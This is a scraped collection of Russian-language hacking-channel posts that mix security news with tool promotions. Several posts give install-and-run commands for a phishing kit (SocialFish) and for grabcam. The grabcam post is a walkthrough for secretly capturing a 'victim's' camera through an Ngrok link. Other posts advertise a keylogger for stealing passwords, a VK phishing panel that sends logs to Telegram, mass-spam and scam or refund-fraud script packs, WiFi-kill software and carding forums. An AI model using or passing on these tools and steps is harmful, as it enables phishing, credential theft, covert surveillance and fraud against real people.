​​🎣 SocialFish

Неплохой фишинговый инструмент с готовыми страницами входа, удобной web панелью и приложением на android.

Установка на свой страх и риск:

git clone https://github.com/UndeadSec/SocialFish.git
sudo apt-get install python3 python3-pip python3-dev -y
cd SocialFish
python3 -m pip install -r requirements.txt

Запуск:

cd SocialFish
python3 SocialFish.py youruser yourpassword

https://github.com/UndeadSec/SocialFish/

​Американское правительство обеспокоено масштабом хакерских атак на сервера Microsoft Exchange

Благодаря выявленной уязвимости в программном обеспечении от Microsoft хакеры смогли взломать порядка 60 тысяч организаций, использующих Microsoft Exchange Server. «Обнаружена серьезная уязвимость и она может иметь далеко идущие последствия. Правительство США обеспокоено большим количеством жертв», — сказала Дженнифер Псаки.

Число жертв кибератак продолжит расти, а сам инцидент можно будет оценить как мировой кризис в сфере кибербезопасности. Представитель американских властей сообщил , что на всех уровнях правительства США принимаются меры для «оценки и устранения последствий» действий киберпреступников. Киберпреступники стремятся заразить как можно больше компьютеров, прежде чем компания сможет полностью обезопасить всех своих клиентов. Власти США считают что за атакой стоят хакеры из Китая.

@ShadowCasher

​Анализируем информацию в оперативной памяти

Чтобы проводить тщательный анализ всего компьютера, будет недостаточно обращаться только к постоянным хранилищам. Именно поэтому сегодня мы разберемся, как искать и анализировать информацию в оперативной памяти.  

Для начала обновляем пакеты Kali Linux:
apt update && apt upgrade

Клонируем инструмент с репозитория GitHub:
git clone https://github.com/rek7/mXtract

Переходим в директорию инструмента:
cd mXtract

Делаем скрипт исполняемым и запускаем:
chmod +x ./compile.sh
./compile.sh

Вместе с программой поставляется файл example_regexes.db, который содержит в себе регулярное выражение, примерно соответствующее IPv4 адресам.

Запускаем команду для поиска:
./mxtract -wr -e -i -d=/tmp/output/ -r=example_regexes.db

Все результаты будут сохранены в файл, который будет находится в пользовательской директории tmp/output/.

​Предотвращаем сетевые атаки

Сегодня мы разберемся, как защититься от различного рода сетевых атак с помощью GhostInTheNet.

Для начала обновляем пакеты Kali Linux:
apt update && apt upgrade

Клонируем инструмент с репозитория GitHub:
git clone https://github.com/cryptolok/GhostInTheNet.git

Переходим в директорию инструмента:
cd GhostInTheNet

Теперь нам нужно узнать имя основного сетевого интерфейса с помощью команды: ifconfig

Делаем скрипт исполняемым и запускаем:
chmod +x ./GhostInTheNet.sh
./GhostInTheNet.sh on <сетевой интерфейс>

Инструмент применит специальные правила для сетевой трансляции, чтобы предотвратить возможные сетевые атаки со стороны злоумышленников.

@ShadowCasher

​Пожар в датацентре в Страсбурге привел к сбою в работе Google и YouTube в России

В Роскомнадзоре сообщили , что сбой не связан с действиями ведомства по ограничению скорости доступа к соцсети Twitter на территории РФ. Нарушения в работе платформ зафиксированы не только в России, но и в Западной Европе, Японии и части США.

В Роскомнадзоре сослались на данные общедоступного сервиса DownDetector и обратили внимание, что нарушения в работе сайтов также были зафиксированы на территории стран Западной Европы, Японии и Восточного побережья США. Это связано с тем, что, по данным хостинг-провайдера OVH, его дата-центры пострадали от пожара. В частности, по сообщению главы OVH, ЦОД SBG2 уничтожен полностью, SBG1 - частично, из-за этого фиксируются перебои в работе различных сайтов по всему миру, указано в справке регулятора.

Ранее сообщалось, что при работе с сервисами YouTube и Google в разных странах наблюдались сбои. Большинство пользователей не могли загрузить сайты, испытывали трудности при входе в учетную запись, а пользователи YouTube также сообщали о проблемах при просмотре видео.

@ShadowCasher

​#софт

HaxorKit (Hacker Toolkit)

HaxorKit - это набор инструментов для пентестеров и хакеров, который довольно прост в использовании и нацелен на обучение. В нем реализованы такие возможности как: Admin Finder, Nmap, Google Dork, Sql Scanner, Dir Scanner, Reverse Ip, Subdo Scan, Email Spider.

💾 Скачать

#софт

Encoder

Encoder - базовый анкриптор на Android. Инструмент работает с многими популярными видами кодировки текста. Стоит отметить, что в приложение также внедрена функция декодирования и возможность вычислять MD5 и SHA.

💾Скачать

#софт

Maxthon Browser

Считаете ли вы, что ваш текущий веб-браузер работает слишком медленно или не отображает ваши веб-страницы в полной мере?Высочайшая скоростью, лучшая совместимостью с широким спектром операционных систем, множество настраиваемых функций - все это совмещает в себе браузер Maxthon.

💾 Скачать

#софт

PrivaZer

PrivaZer может сканировать любой диск, подключенный к вашему компьютеру, на предмет следов, которые вы оставили во время использования компьютера, включая интернет-кеш или файлы cookie, остаточные удаленные файлы или бесполезные файлы. По сути, это утилита для очистки, ориентированная на вашу конфиденциальность.

💾 Скачать

Все способы отследить местоположение вашего смартфона

🕸 Смотреть статью

🔗 ФАРМИМ ХАЛЯВУ - Канал с халявой в интернете

Cкрипт сервиса по спаму на почту!

Предназначен для массовой (очень массовой) отправки email адресатам. Это полноценная система, которая позволяет собирать подписную базу через форму подписки, сегментировать ее, отправлять письма активации, отправлять автоматически письма.

🔐 Пароль: @Arena_Soft

🗃 Dark Arena - только лучшее!

Disk Drill Professional

Поможет вернуть удалённые файлы с жёстких дисков, флешек, карт памяти и других носителей с файловыми системами HFS, HFS+, FAT16, FAT32, NTFS, EXT3, EXT4.

🔐 Пароль: @Arena_Soft

🗃 Dark Arena - только лучшее!

Огромный пак проектов, скриптов и схем!

Проекты: антикино ,авито , юла итд
Скрипты: скам CS:GO, казино итд
Скрыпты: рефаунд такси, абузы итд

🔐 Пароль: @Arena_Soft

🗃 Dark Arena - только лучшее!

KeyLogger — узнаём пароли пользователя!

Кейлoгeр — это программ, которая, попав на компьютер, запоминает все символы, которые будут вводить на данном устройстве.

Использовать советую только на виртуалке / дедике.

🔐 Пароль: @Arena_Soft

🗃 Dark Arena - только лучшее!

Фишинг VK Admin&Spam Panel, шаблоны, отправка логов в Telegram.

Инструкция по установке:

1. Залить файлы на хостинг
2. Создать БД
3. Импортировать БД (database.sql)
4. В файле bdlog.рhр указать данные для подключения к БД
5. Изменить версию PHP на 5.6

Админ панель ➔ /admin
Панель спамера ➔ /lightadmin

Пароль на архив: @tg_inc_soft


Incognito | Обучение - открыт новый набор, успей занять место!

WIFI KILL  

Перед вами софт для отключения интернета. Действует на всех пользователей, подключенных к Wi-Fi сети. Действие также распространяется и на проводных клиентов. Приложение для android.

Противоположность восстановлению файлов - это полное уничтожение - то, что вы делаете, чтобы защитить файл от чужих рук. Eraser делает это, записывая на том месте на вашем диске, где находились файлы, до тех пор, пока они не будут очищены, без шансов, что они вернутся, чтобы преследовать вас. Используйте его, чтобы запланировать очистку свободного места на диске или просто очистить корзину.

​​​​Как взломать вебку с помощью смартфона?

Сегодня рассмотрим реально рабочий хак камеры ноутбука или смартфона. Для того, чтобы всё получилось вам понадобится Android-смартфон с приложением Termux, 5 минут свободного времени и немного, чтобы потенциальная жертва открыла подготовленную нами ссылку.

После открытия termux вводим команды:

$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install wget -y
$ pip install lolcat
$ pkg install git -y
$ git clone https://github.com/noob-hackers/grabcam
$ cd grabcam
$ chmod +x grabcam.sh
$ bash grabcam.sh

После идем в настройки телефона, включаем моб. интернет и раздаем wi-fi. Вернувшись в termux, выбираем пункт Ngrok, копируем полученную ссылку, отправляем её жертве - всё!

Для того, чтобы посмотреть фотки вводим:

$ ls
$ termux-open camназваниевашейкартинки.png (у меня cam28Aug2020.png)

Список форумов по хакингу,  кардингу и заработку в дарке!

На форумах можно найти много полезной инфы и заработать куча денег - если использовать в правильном русле.

Не забываем про безопасность!

​​Звоним без сим-карты

Доброго времени суток! Многим ли из вас в ходе своей деятельности приходиться звонить разным людям со своего номера? При этом, такие звонки могут быть адресованы нежелательным для вас людям, и вы бы хотели позвонить так, что бы остаться полностью анонимным?

Как известно, использование сим-карты идентифицирует вас c ближайшей к вам сотовой вышкой, поэтому, даже использование левой симки не решит вашу проблему, так как вы все-равно будете в сети. Также, по вышкам сотовой связи вас будет довольно просто запеленговать.

Решение такого вопроса можно найти просто используя сервисы для звонков, которые осуществляют звонок через сеть ТОR, и имеют высокую степень шифрования в сети.

Вот список подобных сервисов:

1. TOX → ТЫК ←
2. Ring → ТЫК ←
3. Jitsi → ТЫК ←
4. Linphone → ТЫК ←
5. Mumble → ТЫК ←